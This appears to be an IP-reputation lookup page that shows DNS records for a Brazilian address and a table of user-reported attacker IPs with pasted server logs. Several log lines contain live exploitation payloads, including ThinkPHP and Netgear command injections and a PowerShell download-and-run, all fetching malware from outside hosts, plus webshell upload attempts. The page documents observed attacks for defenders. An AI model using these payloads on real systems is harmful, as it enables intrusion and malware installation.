城市(city): unknown
省份(region): unknown
国家(country): Brazil
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 186.195.98.191
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 46604
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;186.195.98.191. IN A
;; AUTHORITY SECTION:
. 3600 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2019060800 1800 900 604800 86400
;; Query time: 68 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Sat Jun 08 15:54:08 CST 2019
;; MSG SIZE rcvd: 118
191.98.195.186.in-addr.arpa domain name pointer 186-195-98-191.gigabytetelecom.com.br.
Server: 67.207.67.2
Address: 67.207.67.2#53
Non-authoritative answer:
191.98.195.186.in-addr.arpa name = 186-195-98-191.gigabytetelecom.com.br.
Authoritative answers can be found from:
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 78.101.86.240 | attack | 78.101.86.240 - - [03/Apr/2019:12:25:10 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://185.22.154.89/bins/September.mips%20-O%20/var/tmp/September.mips;%20chmod%20777%20/var/tmp/September.mips;%20/var/tmp/September.mips;%20rm%20-rf%20/var/tmp/September.mips&curpath=/¤tsetting.htm=1" 400 0 "-" "-" |
2019-04-03 12:28:10 |
| 139.59.26.155 | attack | 139.59.26.155 - - [07/Apr/2019:22:50:18 +0800] "GET /phpMyAdmin/ HTTP/1.1" 301 194 "-" "ZmEu" 139.59.26.155 - - [07/Apr/2019:22:50:18 +0800] "GET /phpmyadmin/ HTTP/1.1" 301 194 "-" "ZmEu" |
2019-04-08 04:57:56 |
| 132.232.10.4 | attack | 132.232.10.4 - - [08/Apr/2019:19:30:14 +0800] "GET /s/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" 132.232.10.4 - - [08/Apr/2019:19:30:14 +0800] "GET /MyAdmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" 132.232.10.4 - - [08/Apr/2019:19:30:14 +0800] "GET /phpMyAdmin1/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" 132.232.10.4 - - [08/Apr/2019:19:30:14 +0800] "GET /phpMyAdmin123/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" |
2019-04-08 19:51:21 |
| 138.197.77.207 | attack | 138.197.77.207 - - [01/Apr/2019:06:39:02 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://159.65.65.37/leet.x86;cat%20leet.x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp HTTP/1.1" 301 194 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64" 138.197.77.207 - - [01/Apr/2019:06:39:04 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://159.65.65.37/leet.x86;cat%20leet.x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp HTTP/1.1" 404 209 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64" 138.197.77.207 - - [01/Apr/2019:06:39:04 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://159.65.65.37/leet.x86;cat%20leet.x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp HTTP/1.1" 301 194 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64" |
2019-04-01 06:59:47 |
| 203.208.60.29 | bots | 没想到谷歌中国的IP和海外的ip还不一样,海外的是66.249.*.* |
2019-04-04 08:02:54 |
| 118.25.49.95 | attack | 118.25.49.95 - - [02/Apr/2019:20:00:02 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start%20C:/Windows/temp/lodhbrsdjsbwixa27329.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start C:/Windows/temp/lodhbrsdjsbwixa27329.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [02/Apr/2019:20:00:02 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [02/Apr/2019:20:00:02 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start%20C:/Windows/temp/lodhbrsdjsbwixa27329.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start C:/Windows/temp/lodhbrsdjsbwixa27329.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-02 20:03:22 |
| 1.20.100.97 | attack | 1.20.100.97 - - [08/Apr/2019:08:27:17 +0800] "POST https://www.eznewstoday.com/wp-login.php HTTP/1.1" 200 5534 "https://www.eznewstoday.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.54.17) Gecko/20166441 Firefox/52.54.17" |
2019-04-08 08:28:11 |
| 113.200.201.130 | attack | 113.200.201.130 - - [08/Apr/2019:12:07:26 +0800] "POST /up.php HTTP/1.1" 404 499 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" 113.200.201.130 - - [08/Apr/2019:12:07:26 +0800] "POST /test123.php HTTP/1.1" 404 504 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" 113.200.201.130 - - [08/Apr/2019:12:07:26 +0800] "POST /test123.php HTTP/1.1" 404 504 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" 113.200.201.130 - - [08/Apr/2019:12:07:27 +0800] "POST /fb.php HTTP/1.1" 404 499 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" 113.200.201.130 - - [08/Apr/2019:12:07:27 +0800] "POST /paylog.php HTTP/1.1" 404 503 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" 113.200.201.130 - - [08/Apr/2019:12:07:27 +0800] "POST /paylog.php HTTP/1.1" 404 503 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" |
2019-04-08 12:08:33 |
| 118.25.71.65 | attack | 攻击型IP 118.25.71.65 - - [31/Mar/2019:20:32:01 +0800] "PUT /FxCodeShell.jsp%20 HTTP/1.1" 400 682 "http://118.25.52.138:443/FxCodeShell.jsp%20" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.71.65 - - [31/Mar/2019:20:32:01 +0800] "PUT /FxCodeShell.jsp::$DATA HTTP/1.1" 400 682 "http://118.25.52.138:443/FxCodeShell.jsp::$DATA" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.71.65 - - [31/Mar/2019:20:32:01 +0800] "PUT /FxCodeShell.jsp/ HTTP/1.1" 400 682 "http://118.25.52.138:443/FxCodeShell.jsp/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 118.25.71.65 - - [31/Mar/2019:20:32:01 +0800] "GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-03-31 20:42:33 |
| 161.69.99.11 | bots | 161.69.99.11 - - [06/Apr/2019:04:44:10 +0800] "GET / HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0" 161.69.99.11 - - [06/Apr/2019:04:44:11 +0800] "GET / HTTP/1.1" 200 3261 "http://118.25.52.138" "Go-http-client/1.1" |
2019-04-06 04:47:39 |
| 77.247.109.8 | attack | 端口扫描 黑客攻击 |
2019-04-04 08:12:04 |
| 121.201.98.53 | bots | 121.201.98.53 - - [03/Apr/2019:13:30:46 +0800] "GET /index.php/category/root/deep-learning/geoffrey-hinton/ HTTP/1.1" 200 9321 "-" "-" 121.201.98.53 - - [03/Apr/2019:13:30:48 +0800] "GET /index.php/category/root/deep-learning/yann-lecun/ HTTP/1.1" 200 11081 "-" "-" 121.201.98.53 - - [03/Apr/2019:13:30:52 +0800] "GET /index.php/category/root/deep-learning/yoshua-bengio/ HTTP/1.1" 200 11401 "-" "-" 121.201.98.53 - - [03/Apr/2019:13:30:54 +0800] "GET /index.php/category/root/deep-learning/fei-fei-li/ HTTP/1.1" 200 9369 "-" "-" |
2019-04-03 13:32:54 |
| 46.37.12.23 | attack | 46.37.12.23 - - [01/Apr/2019:09:07:28 +0800] "GET /admin//config.php HTTP/1.1" 404 232 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5" |
2019-04-01 09:08:57 |
| 194.183.5.226 | botsattack | 194.183.5.226 - - [08/Apr/2019:10:43:42 +0800] "GET //ldskflks HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 194.183.5.226 - - [08/Apr/2019:10:43:43 +0800] "GET //ldskflks HTTP/1.1" 308 249 "http://118.25.52.138:80//ldskflks" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 194.183.5.226 - - [08/Apr/2019:10:43:44 +0800] "GET / HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 194.183.5.226 - - [08/Apr/2019:10:43:44 +0800] "GET / HTTP/1.1" 200 3261 "http://118.25.52.138/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" |
2019-04-08 10:45:12 |
| 195.231.8.124 | attack | 195.231.8.124 - - [04/Apr/2019:11:25:59 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://185.244.25.145/love/ai.x86%20;chmod%20777%20*%20ai.x86;%20cat%20ai.x86%20%3E%20efjins;chmod%20777%20efjins;./efjins%20thinkphp HTTP/1.1" 301 194 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.5.1.el7.x86_64" |
2019-04-04 11:57:20 |